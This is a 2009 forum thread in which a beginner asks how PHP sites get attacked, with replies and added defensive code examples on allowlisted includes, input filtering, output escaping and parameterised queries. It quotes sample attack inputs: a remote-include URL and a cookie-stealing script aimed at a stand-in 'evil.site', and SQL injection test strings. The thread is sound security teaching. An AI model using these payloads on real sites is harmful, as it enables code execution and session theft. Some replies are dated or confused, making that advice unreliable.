Php Security Questions?
Old 08-09-2009, 09:34 AM Php Security Questions?
Average Talker

Posts: 22
Name: David
Trades: 0
I have been reading a lot about PHP security and how to stop people from breaking into my site and all that, and I am having a hard time understanding the ways they can break in or just mess my site up.

Can someone tell me plainly the ways that people use to break into websites and how to stop it? I already know that they can use SQL injections and input SQL injection into my input or form fields and I should filter out all the inputs on my site, but that is all that I basically know right now.
Old 08-09-2009, 11:02 AM Re: Php Security Questions?
freeloader's Avatar
Experienced Talker

Posts: 35
Trades: 0
  • SQL injection
  • includes and requires not sanitized, i.e.
    PHP Code:
    include($_GET['page']); 
    then the attacker can make a request like /?page=http://evil.site/php.code, which then executes evil PHP code if remote connections are allowed. There are other methods exploiting this same principle.
  • other unsafe PHP (unsafe again as in not sanitized for all expected values), reading (from configuration), writing to files (overwriting, DoS)
  • XSS - if an attacker can inject content into your HTML site (if you let him), like, you have
    http://your.site/?warning='This is some stupid warning', and attacker writes http://your.site/?modifier=<script>send client cookie to evil.site</script>, and then sends this link to thousands of people who *have an account* at your website, he can then steal their session cookies ~ accounts. This is not a server attack, but very frequent these days. If you have a user base that logs into your site, this is definitely something to consider.
  • CSRF
  • ...
  • ?
[google]sql injection[/google]
[google]php code injection[/google]
[google]xss[/google]
[google]csrf[/google]
__________________
"It is a profitable thing, if one is wise, to seem foolish." --Aeschylus
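
The `include($_GET['page'])` item in the post above, as an added example that is not part of the original thread: the request value is only ever used as a key into a fixed allowlist, so a URL or a `../` path never reaches `include`. The page names and file paths are hypothetical.

```php
<?php
// Added example: resolve a user-supplied page name against a fixed allowlist
// instead of passing it to include(). Page names and paths are hypothetical.

const PAGES = [
    'home'    => 'pages/home.php',
    'about'   => 'pages/about.php',
    'contact' => 'pages/contact.php',
];

/**
 * Map the raw ?page= value to a script path. Anything that is not an exact
 * allowlist key (URLs, ../ sequences, arrays, missing values) falls back to 'home'.
 */
function resolve_page($requested): string
{
    if (!is_string($requested) || !array_key_exists($requested, PAGES)) {
        return PAGES['home'];
    }
    return PAGES[$requested];
}

// Constructed sample inputs, including the remote-URL form from the post.
$samples = [
    'about',
    'http://evil.site/php.code',
    '../../etc/passwd',
    ['nested' => 'array'],
    null,
];

foreach ($samples as $input) {
    printf("%-32s -> %s\n", json_encode($input, JSON_UNESCAPED_SLASHES), resolve_page($input));
}

// In a front controller the call would be:
//   include __DIR__ . '/' . resolve_page($_GET['page'] ?? 'home');
```

Keeping `allow_url_include = Off` in php.ini (the default) blocks the remote-URL form, but not local path traversal, which is why the allowlist is still needed.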

Old 08-09-2009, 11:54 AM Re: Php Security Questions?
Average Talker

Posts: 22
Name: David
Trades: 0
I have no idea what you just said; I cannot even really understand it.

And what is this supposed to mean below?

[google]sql injection[/google]
[google]php code injection[/google]
[google]xss[/google]
[google]csrf[/google]

If that is supposed to mean for me to look it up on Google, then I have already said in my first post that I have been reading a lot and I am having a hard time understanding it, so you posting a bunch of garbage between fake Google tags is not helping, because I can go look it up but it will still be hard for me to understand.
Old 08-09-2009, 12:16 PM Re: Php Security Questions?
freeloader's Avatar
Experienced Talker

Posts: 35
Trades: 0
Those are keywords into more specific subjects of website, namely PHP, security.
When you study all those, if you have any definite questions, please ask.
Old 08-10-2009, 07:27 AM Re: Php Security Questions?
EdB
Skilled Talker

Posts: 79
Name: Ed Barnett
Trades: 0
The take home message is always always ALWAYS do the following...

1. Filter input e.g. Make sure you receive a value you are expecting - it could be a number, only letters, more than 30 characters, less than or equal to 2 or whatever etc.

2. Escape output e.g. use htmlentities() for anything going to the browser. This way if there's any dirty code (as a result of your site being hacked) this will deactivate it before it reaches the browser.

Strictly speaking if you filter input correctly then you won't need to escape output. But ALWAYS do both. It's good to read up on how each vulnerability works but if you live by these rules you won't go far wrong!
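
The two rules from the post above, as an added example that is not part of the original thread: each field is checked against what it is expected to be, and the value is escaped with `htmlentities()` where it is written to the page. The field names, limits and sample request are hypothetical; the free-text comment is a field whose filter has to accept `<` and `&`, so the output step does the work there.

```php
<?php
// Added example: filter input, then escape output. Field names and limits are hypothetical.

/** Username: letters, digits, underscore, 3 to 30 characters; null if not. */
function filter_username($raw): ?string
{
    if (!is_string($raw) || preg_match('/\A[A-Za-z0-9_]{3,30}\z/', $raw) !== 1) {
        return null;
    }
    return $raw;
}

/** Age: a whole number from 13 to 120; null if not. */
function filter_age($raw): ?int
{
    $opts = ['options' => ['min_range' => 13, 'max_range' => 120]];
    $age  = filter_var($raw, FILTER_VALIDATE_INT, $opts);
    return $age === false ? null : $age;
}

/** Comment: free text up to 500 bytes, so markup characters are legal input. */
function filter_comment($raw): ?string
{
    return (is_string($raw) && $raw !== '' && strlen($raw) <= 500) ? $raw : null;
}

/** Escape for HTML text and quoted attribute values. */
function e(string $value): string
{
    return htmlentities($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Constructed request data standing in for $_POST.
$post = [
    'username' => 'david_22',
    'age'      => '17 years',                       // rejected: not an integer
    'comment'  => 'if a < b then <b>bold</b> & "quotes"',
];

$username = filter_username($post['username'] ?? null);
$age      = filter_age($post['age'] ?? null);
$comment  = filter_comment($post['comment'] ?? null);

if ($username === null || $age === null || $comment === null) {
    echo "Rejected: one or more fields failed validation\n";
}
// Even valid fields are escaped at the point of output.
echo '<p class="comment">', e($comment ?? ''), '</p>', "\n";
```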
Old 08-25-2009, 11:19 PM Re: Php Security Questions?
Junior Talker

Posts: 1
Name: Alfie Florante
Trades: 0
I accede to you freeloader that those are keywords into added specific capacity of website.
Old 08-26-2009, 01:33 AM Re: Php Security Questions?
Average Talker

Posts: 17
Name: Jeremy
Location: WV
Trades: 0
In addition to filtering and escaping, you can also typecast inputs. If you're expecting a number as an input, you can use intval() for example.

Your most important tool is mysql_real_escape_string()
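
Typecasting with `intval()` as described in the post above, as an added example that is not part of the original thread. `mysql_real_escape_string()` belongs to the old mysql extension, which was removed in PHP 7.0, so this example swaps in PDO bound parameters for the string case; it assumes the pdo_sqlite extension so that it runs without a database server, and the table and rows are constructed.

```php
<?php
// Added example. Assumes the pdo_sqlite extension; the table and rows are constructed.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT)');
$db->exec("INSERT INTO users (name) VALUES ('alice'), ('bob'), ('carol')");

/** Numeric input: typecast first, then bind as an integer. */
function find_by_id(PDO $db, $rawId): array
{
    // intval() keeps leading digits and drops the rest: "2 OR 1=1" becomes 2,
    // "abc" becomes 0. Use a strict check instead if malformed input should fail.
    $id = intval($rawId);
    $stmt = $db->prepare('SELECT id, name FROM users WHERE id = :id');
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

/** String input: sent as a bound parameter, never spliced into the SQL text. */
function find_by_name(PDO $db, string $rawName): array
{
    $stmt = $db->prepare('SELECT id, name FROM users WHERE name = :name');
    $stmt->execute([':name' => $rawName]);
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Constructed inputs standing in for $_GET values.
foreach (['2', '2 OR 1=1', 'abc'] as $rawId) {
    printf("id=%-10s rows=%d\n", json_encode($rawId), count(find_by_id($db, $rawId)));
}
foreach (['bob', "bob' OR '1'='1"] as $rawName) {
    printf("name=%-18s rows=%d\n", json_encode($rawName), count(find_by_name($db, $rawName)));
}
```

The id lookups match one row, one row and no rows; the name lookups match one row and no rows, because the quote characters in the second name are compared as data rather than parsed as SQL.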
Old 08-28-2009, 05:29 PM Re: Php Security Questions?
Novice Talker

Posts: 3
Trades: 0
Hi,
I would agree with using the typecast inputs. I think this will help you.
Just try this.
Another solution is SQL injection for which you have the basic information.
Thanks!!
Last edited by snv123; 08-28-2009 at 05:30 PM..